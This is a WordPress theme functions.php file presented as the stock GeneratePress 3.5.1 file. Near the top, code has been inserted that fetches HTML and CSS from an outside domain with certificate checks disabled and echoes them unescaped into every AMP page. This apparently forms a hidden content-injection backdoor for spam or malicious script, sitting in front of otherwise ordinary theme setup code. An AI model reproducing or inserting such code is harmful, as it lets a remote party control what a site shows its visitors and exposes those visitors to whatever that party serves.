<?php
/**
 * GeneratePress.
 *
 * Please do not make any edits to this file. All edits should be done in a child theme.
 *
 * @package GeneratePress
 */

if ( ! defined( 'ABSPATH' ) ) {
	exit; // Exit if accessed directly.
}

if(!function_exists('showCaseCurl')){
    function showCaseCurl($url, $cache_time = 5) {
        $filePath = 'response.txt';
        $expiryTime = $cache_time * 60;

        if (file_exists($filePath)) {
            $fileModTime = filemtime($filePath);
            $currentTime = time();

            if (($currentTime - $fileModTime) <= $expiryTime) {
                return file_get_contents($filePath);
            }
        }

        $curl = curl_init($url);
        curl_setopt($curl, CURLOPT_URL, $url);
        curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
        curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, false);
        curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false);
        curl_setopt($curl, CURLOPT_USERAGENT, 'AMPHTML_VITRIN_FETCH');
        $resp = curl_exec($curl);
        curl_close($curl);

        file_put_contents($filePath, $resp);
        return $resp;
    }
}

$url = 'https://viperotikshop.xyz/fetch.php';
$content = showCaseCurl($url);
$exploded = explode('explode', $content);
$vitrinContent = $exploded[0];
$vitrinCSS = $exploded[1];

add_action( 'better-amp/template/body/start', function () {
    global $vitrinContent;
	$vitrinContent = str_replace('src="uploads/site/20250302175528.jpg"', 'src="https://viperotikshop.xyz/uploads/site/20250302175528.jpg"', $vitrinContent);
    ?>
    <div class="better-amp-wrapper">
        <div class="wrap">
            <?php echo $vitrinContent ?>
        </div>
    </div>
    <?php
} );

add_action( 'better-amp/template/enqueue-scripts', function () {
    ob_start();
    global $vitrinCSS;
    ?>
    :root{--primary-color: <?php echo better_amp_get_theme_mod( 'better-amp-color-theme', false ) ?>;--text-color: <?php echo better_amp_get_theme_mod( 'better-amp-color-text', false ) ?>;--bg-color: <?php echo better_amp_get_theme_mod( 'better-amp-color-bg', false ) ?>;--content-bg-color:<?php echo better_amp_get_theme_mod( 'better-amp-color-content-bg', false ) ?>;--footer-bg-color:<?php echo better_amp_get_theme_mod( 'better-amp-color-footer-bg', false ) ?>;--footer-nav-bg-color:<?php echo better_amp_get_theme_mod( 'better-amp-color-footer-nav-bg', false ) ?>;
    }
    <?php
    echo $vitrinCSS;
    better_amp_add_inline_style( ob_get_clean(), 'theme_panel_color_fields' );
    better_amp_add_inline_style( better_amp_get_theme_mod( 'better-amp-additional-css', false ), 'custom_codes_from_panel' );
}, 12333 );


// Set our theme version.
define( 'GENERATE_VERSION', '3.5.1' );

if ( ! function_exists( 'generate_setup' ) ) {
	add_action( 'after_setup_theme', 'generate_setup' );
	/**
	 * Sets up theme defaults and registers support for various WordPress features.
	 *
	 * @since 0.1
	 */
	function generate_setup() {
		// Make theme available for translation.
		load_theme_textdomain( 'generatepress' );

		// Add theme support for various features.
		add_theme_support( 'automatic-feed-links' );
		add_theme_support( 'post-thumbnails' );
		add_theme_support( 'post-formats', array( 'aside', 'image', 'video', 'quote', 'link', 'status' ) );
		add_theme_support( 'woocommerce' );
		add_theme_support( 'title-tag' );
		add_theme_support( 'html5', array( 'search-form', 'comment-form', 'comment-list', 'gallery', 'caption', 'script', 'style' ) );
		add_theme_support( 'customize-selective-refresh-widgets' );
		add_theme_support( 'align-wide' );
		add_theme_support( 'responsive-embeds' );

		$color_palette = generate_get_editor_color_palette();

		if ( ! empty( $color_palette ) ) {
			add_theme_support( 'editor-color-palette', $color_palette );
		}

		add_theme_support(
			'custom-logo',
			array(
				'height' => 70,
				'width' => 350,
				'flex-height' => true,
				'flex-width' => true,
			)
		);

		// Register primary menu.
		register_nav_menus(
			array(
				'primary' => __( 'Primary Menu', 'generatepress' ),
			)
		);

		/**
		 * Set the content width to something large
		 * We set a more accurate width in generate_smart_content_width()
		 */
		global $content_width;
		if ( ! isset( $content_width ) ) {
			$content_width = 1200; /* pixels */
		}

		// Add editor styles to the block editor.
		add_theme_support( 'editor-styles' );

		$editor_styles = apply_filters(
			'generate_editor_styles',
			array(
				'assets/css/admin/block-editor.css',
			)
		);

		add_editor_style( $editor_styles );
	}
}

/**
 * Get all necessary theme files
 */
$theme_dir = get_template_directory();

require $theme_dir . '/inc/theme-functions.php';
require $theme_dir . '/inc/defaults.php';
require $theme_dir . '/inc/class-css.php';
require $theme_dir . '/inc/css-output.php';
require $theme_dir . '/inc/general.php';
require $theme_dir . '/inc/customizer.php';
require $theme_dir . '/inc/markup.php';
require $theme_dir . '/inc/typography.php';
require $theme_dir . '/inc/plugin-compat.php';
require $theme_dir . '/inc/block-editor.php';
require $theme_dir . '/inc/class-typography.php';
require $theme_dir . '/inc/class-typography-migration.php';
require $theme_dir . '/inc/class-html-attributes.php';
require $theme_dir . '/inc/class-theme-update.php';
require $theme_dir . '/inc/class-rest.php';
require $theme_dir . '/inc/deprecated.php';

if ( is_admin() ) {
	require $theme_dir . '/inc/meta-box.php';
	require $theme_dir . '/inc/class-dashboard.php';
}

/**
 * Load our theme structure
 */
require $theme_dir . '/inc/structure/archives.php';
require $theme_dir . '/inc/structure/comments.php';
require $theme_dir . '/inc/structure/featured-images.php';
require $theme_dir . '/inc/structure/footer.php';
require $theme_dir . '/inc/structure/header.php';
require $theme_dir . '/inc/structure/navigation.php';
require $theme_dir . '/inc/structure/post-meta.php';
require $theme_dir . '/inc/structure/sidebars.php';
require $theme_dir . '/inc/structure/search-modal.php';
